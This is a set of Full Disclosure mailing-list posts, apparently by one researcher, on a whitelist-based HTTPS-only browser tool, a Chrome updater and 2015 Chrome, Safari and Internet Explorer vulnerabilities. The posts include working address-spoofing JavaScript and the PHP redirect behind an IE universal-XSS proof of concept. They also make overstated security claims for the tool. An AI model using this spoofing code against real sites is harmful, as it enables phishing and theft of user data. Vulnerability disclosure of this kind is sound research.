[FD] HTTPS Only 3.1 (Detailed Analysis, Browser Security, Open Source, Python)
To secure the browser, which is very fragile, the approach of HTTPS Only 3.1 is exceptionally simple:
1. Only HTTPS URLs (no other protocols)
2. Whitelist of domains (anything outside of the whitelist is blocked)

Now, let's look at the threats:
1. Man in the middle - it's fixed.
2. Phishing always requires the browser to load the attacker's website, so it's permanently dead here.
3. Drive-by download - dead (if applied strictly, unable to download the executable)
4. Clickjacking - dead (the attacker's web page is unreachable)
5. Address spoofing - dead too (just unable to load the fake content)
6. XSS - almost dead (for the attacker, the XSS vulnerability has to be GET, because POST requires the attacker's HTML)
7. CSRF - almost dead (for the attacker, the CSRF vulnerability has to be GET, and modern web applications simply don't do important things in GET, because it can be bookmarked etc., too dangerous)

URLs:
Project Home Page: https://www.httpsonly.net/
View Source Code: https://www.httpsonly.net/source/

Kind Regards,

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Browser Security Tool: HTTPS Only 2.1 (Major Release, Open Source, Python)
When we browse the web, the top threats are:
1. Remote code execution - everything is lost
2. Man in the middle - sniffing, and tampering
3. Phishing - simple, old, and still quite useful
4. Cross site scripting - data of the vulnerable domain is lost
5. CSRF - unauthorized action

So, what if the browser can only access HTTPS of whitelisted domains? With HTTPS, "man in the middle" is fixed. And with the whitelist, other attacks become very difficult; some even become impossible (such as phishing). Phishing is a huge headache in this era, because URLs can be hidden in legitimate redirection (such as t.co).

That's why we made this simple tool (really simple - less than 200 lines of Python and JavaScript):
Project Home Page - https://www.httpsonly.net/
Source Code - https://github.com/httpsonly/httpsonly

Kind Regards,
[FD] Browser Security Tool: HTTPS Only (Why, How, Open Source, Python)
(@moderators The original post was too brief. This one has details.)

Summary
This tool completely locks the browser - just HTTPS, nothing else.
This tool is extremely simple - less than 100 lines of code (Python and JavaScript).

Why
Firefox Add-on Firesheep Brings Hacking to the Masses
http://www.pcworld.com/article/208727/Firesheep_Brings_Hacking_to_the_Masses.html
"Firesheep is basically a packet sniffer that can analyze all the unencrypted Web traffic"
(Quite a while ago, it's become a "casual game")

Yes, Mozilla said, "Gradually phasing out access to browser features for non-secure websites", in April 2015. After more than six months, they have done nothing useful.

The Chrome team wanted the same stuff:
https://www.chromium.org/Home/chromium-security/marking-http-as-non-secure
Again, nothing significant has been achieved yet.

And there is HTTPS Everywhere, with SO MANY rules:
https://www.eff.org/https-everywhere/atlas/
It's still able to access HTTP by default, but there is "Block all HTTP requests". The problem: nothing happens when the browser tries HTTP - there should be a warning (it's incorrect behavior) and options (try HTTPS, Google Cache, etc.). People complained, months ago:
https://github.com/EFForg/https-everywhere/issues/1329

How
PAC (Proxy auto-config) is used:
If it's HTTPS, that's fine.
If it's HTTP, the user gets a warning and options (try HTTPS, Google Cache - it has HTTPS, etc.).
Anything else, it goes to 0.0.0.0

It's a simple tool that does one job, and does it very well.

URLs
https://httpsonly.github.io/
https://github.com/httpsonly/httpsonly

Best Wishes,
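As an added example (not HTTPS Only's own code), here is a PAC file that applies the HTTPS Only 3.1 policy from the first post (HTTPS to a whitelist of domains only) through the PAC routing described in this one: HTTPS to a whitelisted host goes direct, HTTP goes to a local proxy that serves the warning page, and everything else is sinkholed. The whitelist, the warning proxy at 127.0.0.1:8080 and the 0.0.0.0:0 sinkhole are assumptions for illustration.

```javascript
// Added example, not the project's code. PAC files are plain JavaScript with
// one required entry point, FindProxyForURL(url, host).
var WHITELIST = ["example.com", "nmap.org", "seclists.org"]; // constructed sample list
var WARNING_PROXY = "PROXY 127.0.0.1:8080"; // assumed local proxy that shows the warning/options page
var BLACKHOLE = "PROXY 0.0.0.0:0";          // assumed sinkhole: nothing listens, so the load fails

// True if host is a whitelisted domain itself or a subdomain of one.
// Matching on the dot boundary keeps "evil-example.com" from matching "example.com".
function isWhitelisted(host) {
  host = host.toLowerCase();
  for (var i = 0; i < WHITELIST.length; i++) {
    var d = WHITELIST[i];
    if (host === d || host.slice(-(d.length + 1)) === "." + d) return true;
  }
  return false;
}

// The scheme is everything before "://". Browsers strip the path of https://
// URLs before calling the PAC, but scheme and host are always present.
function schemeOf(url) {
  var idx = url.indexOf("://");
  return idx < 0 ? "" : url.slice(0, idx).toLowerCase();
}

// Called by the browser for every navigation and subresource request.
function FindProxyForURL(url, host) {
  var scheme = schemeOf(url);
  if (scheme === "https" && isWhitelisted(host)) return "DIRECT";
  if (scheme === "http") return WARNING_PROXY; // user gets the warning and options
  return BLACKHOLE; // HTTPS to a non-whitelisted host, ftp://, etc.
}
```

A PAC file only selects the route; the warning page itself has to come from the proxy that HTTP is sent to, and a user who can edit the proxy settings can remove the policy, so it suits a locked-down machine rather than an untrusted one.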
[FD] Open source tool for applying Google Chrome security updates
The Problem
If you are a network administrator, keeping the browser updated is the first thing to do for security. Chrome is a very good browser, but it's a little bit complicated to answer this simple question: what is the version of the latest stable Chrome? And for people in places such as China (no Google services), updating Chrome is not an easy task.

The Solution
The official blog of Chrome Releases contains a lot of information. The code of this project extracts the version number from the official blog, downloads offline installers from the official website if it's a new version, and checks whether the visitor's Chrome is exactly the same.

Security
The best part of this project - users do not need to download and run software to be checked. This project does not even contain JavaScript.

URLs
Source Code: https://github.com/windowschrome
Home Page: http://www.windowschrome.com/
Latest Stable Chrome: http://www.windowschrome.com/data/version.txt
[FD] Google Chrome Address Spoofing - Google's Opinion
It's public now:
https://code.google.com/p/chromium/issues/detail?id=497588

Interesting Points:
They did reproduce:
"I can reproduce this locally"
They say it's DoS:
"seems like any renderer denial-of-service"
(The browser does not crash!)
They say it's not a security issue:
"remove security flags from this bug"
Finally, they stopped replying:
Jun 10 to Jul 2 (unbelievable huge delay)
In the end, they get it:
"Lots of phishing attacks these days tell you to call a phone number"
"No interactions"
Currently, it's Severity-Medium.

Kind Regards,

PS
http://dieyu.org/ Updated!
[FD] Google Chrome Address Spoofing (Request For Comment)
Impact:
The "click to verify" thing is completely broken... Anyone can be "BBB Accredited Business" etc.
You can make whitehouse.gov display "We love Islamic State" :-)
Note: No user interaction on the fake page.

Code:
* index.html
<script>
function next() {
  w.location.replace('http://www.oracle.com/index.html?'+n); n++;
  setTimeout("next();", 15);
  setTimeout("next();", 25);
}
function f() {
  w = window.open("content.html", "_blank", "width=500 height=500");
  i = setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}", 5);
}
</script>
<a href="#" onclick="f()">Go</a><br>

* content.html
<b>This web page is NOT oracle.com</b>
<script>location="http://www.oracle.com/index.html;";</script>

* It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says June/16/2015 - it works as we tested today)

Request For Comment:
We reported this to Google. They reproduced, and say "It's DoS which doesn't matter." We think it's very strange, since the browser does not crash (not DoS), and the threat is obvious.
What's your opinion?

Kind Regards,

PS
We love clever tricks. We love this:
http://dieyu.org/
Re: [FD] Safari Address Spoofing (How We Got It)
Great blog, Michal!

If you change "http://1.2.3.4/;" in your Safari code to some URL in the real world (for example, dailymail.co.uk), your code won't work (the page of the target domain is simply loaded). The trick here is: keep trying to load.

Kind Regards,

__
BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

On 2015/5/31 23:09, Michal Zalewski wrote:
> Well...
> http://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html
>
> On Thu, May 28, 2015 at 10:47 PM, David Leo <david@deusen.co.uk> wrote:
>> Proof of concept:
>> http://www.deusen.co.uk/items/iwhere.9500182225526788/
>> It works on fully patched versions of iOS and OS X.
>>
>> How it works:
>> Just keep trying to load the web page of the target domain.
>>
>> How We Got It:
>> Safari changes the address bar to the new URL BEFORE the new content is loaded.
>>
>> BestSec
>> http://www.deusen.co.uk/items/bestsec/
>> We like it. We read it.
>>
>> Kind Regards,
[FD] Safari Address Spoofing (How We Got It)
Proof of concept:
http://www.deusen.co.uk/items/iwhere.9500182225526788/
It works on fully patched versions of iOS and OS X.

How it works:
Just keep trying to load the web page of the target domain.

How We Got It:
Safari changes the address bar to the new URL BEFORE the new content is loaded.

BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

Kind Regards,
[FD] Very Important Info About Major Internet Explorer Vulnerability - NOT Patched
1. Spartan - vulnerable (Windows 10)
http://www.deusen.co.uk/items/insider3show.3362009741042107/SpartanWin10_screenshot.png
Thanks to Zaakiy Siddiqui!

2.
<?php
sleep(2);
header("Location: http://www.dailymail.co.uk/robots.txt;");
?>
Many asked for it.

3. It's Universal XSS, as we tested:
Not only dailymail.co.uk - also Yahoo etc.
Not only injecting content - also getting private info etc.

Kind Regards,
Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
> could you share the contents of 1.php?
Sure:
<?php
sleep(2);
header("Location: http://www.dailymail.co.uk/robots.txt;");
?>

> I'm assuming it is a delayed re-direct to the target's domain?
Exactly. :-)

> the cloudflare scripts
It's been tested without them.

Kind Regards,

On 2015/2/6 2:31, Barkley, Peter wrote:
> Thanks Zaakiy,
>
> I'm able to get the hacked page on IE9 after changing the document mode from Quirks to IE9 Standards. Screenshot attached. I'm sure you could get around having to manually switch the document mode with the appropriate DOCTYPE set in the exploit html page.
>
> David, could you share the contents of 1.php? I'm assuming it is a delayed re-direct to the target's domain? I am unable to reproduce the exploit locally with the same code (assuming my 1.php is correct), though without the cloudflare scripts.
>
> Thanks,
> Peter
>
> Peter Barkley | Senior Security Intelligence Analyst | Security Operations Centre | Royal Bank of Canada
>
> -----Original Message-----
> From: Fulldisclosure [mailto:fulldisclosure-boun...@seclists.org] On Behalf Of Zaakiy Siddiqui
> Sent: 2015, February, 04 6:46 PM
> To: David Leo; Joey Fowler
> Cc: fulldisclosure@seclists.org; b...@securitytracker.com; bugt...@securityfocus.com; cve-ass...@mitre.org
> Subject: Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
>
> Hi David,
>
> Nice one... great find! And thanks Joey for confirming the bypass of HTTP-to-HTTPS restrictions.
>
> I can confirm that this also affects Spartan Browser (Experimental enabled in about:flags in Internet Explorer 11). I can also confirm that IE 10 is affected. IE 9 appears to not be vulnerable. Screenshots below.
>
> Regards,
> Zaakiy Siddiqui
>
> IE 11 Spartan - vulnerable (Windows 10)
> IE 10 - vulnerable (Windows 7)
> IE 9 - not vulnerable (Windows 7)
>
> From: David Leo <david@deusen.co.uk>
> Sent: Wednesday, 4 February 2015 11:13 PM
> To: Joey Fowler <j...@tumblr.com>
> Cc: bugt...@securityfocus.com, fulldisclosure@seclists.org, b...@securitytracker.com, cve-ass...@mitre.org
>
> Microsoft was notified on Oct 13, 2014.
> Joey thank you very much for your words.
>
> Kind Regards,
>
> On 2015/2/3 4:53, Joey Fowler wrote:
>> Hi David,
>>
>> "nice" is an understatement here. I've done some testing with this one and, while there /are/ quirks, it most definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.
>>
>> As long as the page(s) being framed don't contain X-Frame-Options headers (with `deny` or `same-origin` values), it executes successfully. Pending the payload being injected, most Content Security Policies are also bypassed (by injecting HTML instead of JavaScript, that is).
>>
>> It looks like, through this method, all viable XSS tactics are open!
>>
>> Nice find! Has this been reported to Microsoft outside (or within) this thread?
>>
>> --
>> Joey Fowler
>> Senior Security Engineer, Tumblr
>>
>> On Sat, Jan 31, 2015 at 9:18 AM, David Leo <david@deusen.co.uk> wrote:
>>> Deusen just published code and description here:
>>> http://www.deusen.co.uk/items/insider3show.3362009741042107/
>>> which demonstrates the serious security issue.
>>>
>>> Summary
>>> An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk can be changed by an external domain.
>>>
>>> How To Use
>>> 1. Close the popup window (confirm dialog) after three seconds.
>>> 2. Click "Go".
>>> 3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.
>>>
>>> Technical Details
>>> Vulnerability: Universal Cross Site Scripting (XSS)
>>> Impact: Same Origin Policy (SOP) is completely bypassed
>>> Attack: Attackers can steal anything from another domain, and inject anything into another domain
>>> Tested: Jan/29/2015 Internet Explorer 11 Windows 7
>>>
>>> If you like it, please reply "nice".
>>>
>>> Kind Regards,
[FD] Major Internet Explorer Vulnerability - NOT Patched
Deusen just published code and description here:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
which demonstrates the serious security issue.

Summary
An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk can be changed by an external domain.

How To Use
1. Close the popup window (confirm dialog) after three seconds.
2. Click "Go".
3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.

Technical Details
Vulnerability: Universal Cross Site Scripting (XSS)
Impact: Same Origin Policy (SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject anything into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7

If you like it, please reply "nice".

Kind Regards,